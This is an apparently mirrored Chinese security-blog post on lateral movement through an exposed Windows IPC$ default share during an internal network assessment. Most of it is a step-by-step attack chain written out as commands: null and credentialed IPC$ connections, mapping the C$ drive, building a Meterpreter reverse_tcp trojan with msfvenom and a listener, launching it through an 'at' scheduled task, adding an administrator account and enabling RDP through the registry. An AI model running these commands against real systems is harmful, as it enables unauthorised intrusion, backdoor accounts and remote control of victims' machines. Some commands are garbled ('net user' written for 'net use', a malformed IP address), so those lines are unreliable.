百步穿杨之IPC
2020-12-11 15:17:29 Author: www.freebuf.com(查看原文) 阅读量:131 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

小编在跟进某个内网检查项目时,碰到了开启IPC$默认共享的情况,这可是很难得的机会能碰到这种暴露的攻击点,马上上阵,直捣黄龙。

v2-b973961ac46f06fbdd2b97efde1210f0_720w.jpg

首先netsacan扫描整个ip段,发现ipc$默认共享处于开启状态。使用命令建立IPC$空连接:

net use \\10.xxx.xxx.xxx\ipc$

如果能获取SMB的user和passwrod,则可以使用以下命令建立完整的用户名,密码连接:

net user \\10.xxx.xxx.xxx\ipc$ “password” /user:”username”

连接成功。那就把C盘给映射出来,执行以下命令:

Net use z: \\10.xxx.xxx.xxx\c$

将c映射到z盘

如果是获取到SMB的user和password的,可用以下命令:

Net user z: \\10.xxx.xxx.xxx\c$ “password” /user:”username”

v2-964283462af116411cafc15470a29b1b_720w.jpgv2-49be7e8d86456c13d5f7fed6cb51a09e_720w.jpg

接下来就是给目标机上个木马,使之能够控制目标主机。

此时上大杀气,使用msf生产远程木马

Msfvenom -platform windows -p windows/meterpreter/reverse_tcp LHOST=10.xxx.xxx.xxx LPORT=4444 EXITFUNC=thread -b ‘\x00’ -f exe-only -o test_payload.exe

v2-0c6b718ebd68a8d94238cc197e0c97ae_720w.jpg

然后将马放入隐射出来的c盘中。

v2-abac4f2a799ecdbda0c7222e4e37d8f4_720w.jpg

之后msf启动监听

Use exploit/multi/handler

v2-154cdd2b8345333b19008241621691ab_720w.jpg

Set payload windows/meterpreter/reverse_tcp

v2-e4f57bdba2b4a1a5e985e5e34ed6d884_720w.jpg

Set lhost 10.xxx.xxx.xxx.xxx 
Set lport 4444

执行exploit之后,静置监听。

然后需要在目标机器上执行木马,则用计划任务的方式执行。

返回命令行,使用

Net time \\10.xxx.xxx.xxx 

查看目标时间

v2-9aa307495f124e093544181c5c052e29_720w.jpg

使用

at \\10.xxx.xxx.xx 10:04 C:\Users\Administrator\Pictures\test_payload.exe

将木马放入计划任务中

v2-0410f63bd0c002add9c1b6c2fb75bc9b_720w.jpg

之后在msf中等待一会儿,就接受到反弹shell

v2-11a5f62bdfdc09571e89b333bde8d533_720w.jpgv2-957ad7e76a92f788fbf42504419788e1_720w.jpg

添加一个User5账号

v2-436a4cf8ff1dfb770408506e4b6e57c2_720w.jpg

将该账号组更改到administrators下

v2-5e1580947b75c9934475af975bedc608_720w.jpg

想要通过远程桌面连接上去,便使用命令开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

v2-521ab9c6f63b27bc78fdbf045bdf9317_720w.jpgv2-6d5e70b32681bb6ab7901fa3653aeb7a_720w.jpg

之后用添加的用户远程连接即可

最后记得处理删除IPC$连接。

net use \\xxx.xxx.xxx.xxx\ipc$ /del

总结

本次仅针对IPC入侵做文章记录,通过开启IPC$默认共享的机子进行了横向移动。利用此管道可以在目标是空连接或者知道目标SMB用户名和密码的情况下来完成。


文章来源: https://www.freebuf.com/vuls/257477.html
如有侵权请联系:admin#unsafe.sh